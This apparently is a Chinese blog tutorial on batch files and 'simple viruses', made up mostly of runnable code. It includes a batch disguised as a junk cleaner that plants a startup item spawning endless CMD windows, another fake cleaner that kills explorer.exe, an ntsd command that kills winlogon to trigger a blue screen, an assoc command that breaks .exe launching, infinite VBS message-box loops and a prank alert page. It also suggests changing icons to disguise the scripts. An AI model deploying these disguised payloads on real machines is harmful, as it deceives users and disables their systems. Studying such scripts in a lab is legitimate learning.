【CyberSecurityLearning 28】批处理与简单病毒
批处理案例
@echo off
color 0a
title 飞哥小程序v1.0 :menu
cls
echo ==========================
echo 菜单
echo 1、修改管理员密码
echo 2、定时关机
echo 3、退出本程序
echo ===========================
set /p num=您的选择是:
if "%num%"=="1" goto 1
if "%num%"=="2" goto 2
if "%num%"=="3" goto 3
echo 被闹,好好输!
pause
goto menu:1
set /p u=请输入用户名:
set /p p=请输入新密码:
net user %u% %p% >nul
echo 您的密码已经设置成功!
pause
goto menu:2
set /p time=请输入时间:
shutdown -s -t %time%
set /p x=是否取消(1:是,0:否):
if "%x%"=="1" shutdown -a
goto menu
pause:3
exit病毒
测试环境:虚拟机win2003
注:一些简单的病毒程序请勿在真实机中测试
简单的批处理文件一
功能:伪装垃圾清理程序添加一个开机自启动项,无限弹出CMD窗口
@echo off
title 系统垃圾清理
color 2f
echo =======若杀毒软件恶意拦截,请选择【允许程序的所有操作】========
echo.
echo.
echo :start >c:\windows\windows.bat
echo start cmd>>c:\windows\windows.bat
echo goto start>>c:\windows\windows.bat
copy c:\windows\windows.bat "%USERPROFILE%"\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\" >nul
if %errorlevel%==0 goto next errorlevel是预定义变量,为0时表示上面一条语句执行成功,非0反之
copy c:\windows\windows.bat "%USERPROFILE%\「开始」菜单\程序\启动" >nul
if %errorlevel%==1 goto error
:next
echo.
echo.
echo ====== 垃圾清理中,请不要关闭窗口======
echo.
ping -n 5 127.0.0.1 >nul
echo.
echo ====== 垃圾清理完毕,共清理垃圾500M===
echo.
echo.
echo ====== 建议立即重启电脑
pause
goto ex:error
echo.
echo.
echo ====== 程序运行失败,请使用【管理员权限】重新运行!======
echo.
pause
goto ex:ex
exit
我们来看一下运行效果:
运行完成后我们可以看到在开始启动项中多了一个windows.bat文件。
重启之后,电脑完全死机了。
简单的批处理文件二
功能:伪装垃圾清理程序强制终止桌面进程
@echo off
title 系统垃圾清理
color 2f
echo ====== 若有杀毒软件恶意拦截,请选择【允许程序的所有操作】=====
echo.
echo.:next
echo.
echo.
echo ====== 垃圾清理中,请不要关闭窗口=======
echo.
ping -n 5 127.0.0.1 >nul
taskkill /im explorer.exe /f >nul 2>nul
echo.
echo. ===== 完了,你系统废了======
ping -n 5 127.0.0.1>nul
echo.
start c:\windows\explorer.exe
echo.
echo ====== 已经修复好了!是不是吓坏了!!嘿嘿=========
pause
桌面进程被杀死!
桌面进程恢复:
最简单的蓝屏炸弹文件
ntsd -c q -pn winlogon.ex分析:
ntsd #杀死进程
ntsd -c q -pn 进程名 #强制杀死进程
蓝屏原因:winlogon 进程不能被杀死,我想强制杀死,系统不让,结果导致蓝屏!
对win2003有很大的杀伤力,但对win2008基本没有杀伤力
最简单的病毒
assoc.exe=txtfile分析:修改文件关联,导致文件无法正常打开
测试效果:
最简单的病毒解药
assoc.exe=exefile只需将文件后缀与其关联文对应即可
最简单的脚本
方法:将.txt改为.vbs
msgbox "我最帅!"测试效果:
最简单的死循环脚本
domsgbox "我最帅!" 英文引号loop测试:
效果:窗口无法关闭
解决方法:
vbs 使用微软自带的wscript.exe来编写的
一个有趣的小脚本,大家可以试试
do
msgbox "飞哥最帅!"
msgbox "小子,你对这件事有异议吗"
msgbox "你要为此付出代价"
msgbox "从现在开始我要求你点100下鼠标"
msgbox "100"
msgbox "99"
msgbox "98"
msgbox "97"
msgbox "96"
msgbox "95"
msgbox "94"
msgbox "93"
msgbox "92"
msgbox "91"
msgbox "90"
msgbox "...."
msgbox "3"
msgbox "2"
msgbox "1"
msgbox "如果你看到这里,说明你确实很执着,你感动了我,请再点一下"
msgbox "年轻人,有时候执着也没用,换个姿势再来一次"
loop注:可以用修改图标软件修改vbs文件图标
整人网页
<!DOCTYPE html>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>很恶心的常见整人效果的代码</title>
</head>
<body><a href="" onmouseover="alert('为什么把鼠标放到这里?');
alert('我不是说过不可用这样嘛');
alert('飞哥现在真的很生气');
alert('一点也不给飞哥面子');
alert('你把飞哥的话当什么了');
alert('你知道错了吗?');
alert('什么?你居然...');
alert('写封信给我说对不起吧!');
alert('你能这么做我很欣慰!!!');">不许把鼠标移到这里!</a>点了真爽!!!
</body>
</html>参考:https://blog.csdn.net/weixin_43252204/article/details/105389619
【CyberSecurityLearning 28】批处理与简单病毒相关推荐
- [网络安全学习篇附]:批处理与简单的病毒
目录 初识批处理 一个简单的批处理程序 1.引入 2.echo 输出 3.变量 4.if.goto 病毒 简单的批处理文件一 简单的批处理文件二 最简单的病毒 最简单的病毒解药 最简单的脚本 最简单的 ...
- 批处理完成“Autorun病毒免疫”
前段时间"Autorun病毒"肆意泛滥,一时间几乎所有的U盘都成了它的传播载体,系统重装也会因为其他盘被感染而致使其死灰复燃,"Autorun病毒"似乎成了挥之 ...
- oracle 手动批处理,Oracle 简单备份 批处理(BAT)
Oracle的简单备份批处理,有以下两个版本: (需要将代码复制到空的txt文件中,并另存为**.bat文件) 1.基本版:按照配置将数据库备份到指定的目录下 基本版本需要设置一下4个参数(加粗部分) ...
- 实现android应用程序自动化测试的批处理脚本,简单入手移动端并发自动化测试:Appium+Robot+ 批处理脚本...
一.前言 好久没写帖子,去年晋升为 leader 之后工作比较忙,去年为团队的产品建立了一轮的移动端(Android&iOS)的自动化测试,到今天为止跑了将近半年,前期感觉还行,但随着用例的增 ...
- 使用批处理进行简单U盘杀毒 - TEST
注意事项: 1.此批处理文件仅供学习参考,内有众多注释及解释语句,使用前请详细了解此批处理功能. 2.将代码复制到记事本后,另存为.bat文件,将文件复制或移动到U盘根目录下即可进行杀毒. 3.批处理 ...
- C语言写的简单病毒程序
<script type="text/javascript"> </script><script type="text/javascript ...
- 批处理的简单小游戏 - 猜数字
// 所有原创文章转载请注明作者及链接 // blackboycpp(AT)gmail.com // QQ群: 135202158 出差无聊的时候很多, 最近两天学会了一点点批处理, 写了一个很简单的 ...
- 基于U盘传播的简单病毒
原创作者:nevergone 信息来源: www.retcvc.com 原始连接: http://www.retcvc.com/cgi-bin/topic.cgi?forum=4&topic= ...
- 使用批处理恢复被病毒隐藏的文件和目录
1.复制代码到记事本,另存为.bat文件,复制或移动到需要恢复的目录下双击运行即可. @echo offcolor 0cecho 正在恢复被病毒隐藏的文件和目录... echo.rem 可作用于目录下 ...
最新文章
- 安卓ttf格式的字体包_苹果官网御用字体
- zend studio搭建php开发环境搭建,PHP-Zend Studio PHP环境的搭建
- 【深度学习】用 YOLO v5+DeepSORT,打造实时多目标跟踪模型
- 高考 | 满分作文:《我们都是读“书”人》
- java 切面_Java笔试面试精心整理得到89道Spring 核心知识【收藏向】
- table或者列表中超出的字用省略号代替的方法(支持IE6)
- java 开源im_开源IM项目-InChat登录接口设计与实现(基于Netty)
- java项目介绍_java项目介绍及创建
- Faster:一个高效就地更新的并发键值存储
- vue3 setup写法(语法糖版本)
- 解决AMD Software提示图形驱动版本不匹配问题
- linux网络hack用法之onlink路由
- 数据库分库分表,分片配置轻松入门!
- 已知补码如何求原码、真值
- 关于ios代码混淆的一些注意事项
- 制作ubuntu系统的 usb启动盘
- 秒懂频分多址FDMA、时分多址TDMA、码分多址CDMA、空分多址SDMA
- python个人自动化_GAD名人堂丨方李志专访 :于Python的UI自动化测试探索者
- 笔记:关于QMap使用时候的一点技巧
- kiss原则包括什么_标书中的KISS原则